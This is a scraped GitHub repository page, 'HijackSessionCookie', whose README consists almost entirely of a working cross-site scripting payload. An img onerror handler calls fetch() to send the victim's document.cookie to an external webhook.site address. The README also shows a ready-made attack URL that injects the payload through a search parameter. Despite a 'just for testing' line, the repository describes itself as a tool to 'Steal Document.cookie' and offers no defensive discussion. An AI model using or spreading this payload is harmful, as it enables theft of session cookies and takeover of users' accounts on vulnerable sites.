Skip to content

GH0STH4CKER/HijackSessionCookie

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

Repository files navigation

Just for testing purposes

Payload

<img src=x onerror="fetch(`https://webhook.site/3cd37862-c917-46b1-b599-ba1c624bc379?${document.cookie}`).then(response => response.json()).then(data => console.log(data)).catch(error => console.error('Error:', error));">

Payload integrated URL (cookie is stolen through a xss vulnerable site)

https://www.yoursite.com/search?term=<img src=x onerror="fetch(`https://webhook.site/3cd37862-c917-46b1-b599-ba1c624bc379?${document.cookie}`).then(response => response.json()).then(data => console.log(data)).catch(error => console.error('Error:', error));">

This is the xss vulnerable site and search url :https://www.yoursite.com/search?term=

This sends session cookie to webhook site.

About

Steal Document.cookie

Topics

xss-exploitation cookie-session cookie-stealer

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published